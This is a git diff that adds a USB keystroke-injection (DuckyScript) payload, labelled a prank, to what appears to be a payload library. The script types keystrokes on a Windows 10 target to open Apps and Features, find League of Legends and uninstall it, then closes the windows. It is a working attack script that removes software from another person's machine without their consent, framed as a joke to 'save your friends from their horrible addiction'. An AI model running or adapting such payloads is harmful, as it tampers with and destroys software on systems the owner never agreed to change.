diff --git a/payloads/library/prank/lol_killer/payload.txt b/payloads/library/prank/lol_killer/payload.txt new file mode 100644 index 0000000..9b65bda --- /dev/null +++ b/payloads/library/prank/lol_killer/payload.txt @@ -0,0 +1,32 @@ +REM Title: lol_killer +REM Author: Skelly +REM Description: Script to uninstall League of Legends from the target system. Save your friends from their horrible addiction. +REM Target: Windows 10 +REM Version: 1.0 +REM Category: Prank +DELAY 1000 +GUI i +DELAY 1000 +STRING apps and features +DELAY 1000 +ENTER +DELAY 1000 +ENTER +TAB +TAB +TAB +DELAY 1000 +STRING league of legends +ENTER +DELAY 1000 +TAB +TAB +TAB +DELAY 1000 +ENTER +TAB +ENTER +DELAY 1000 +ENTER +ALT F4 +ALT F4 \ No newline at end of file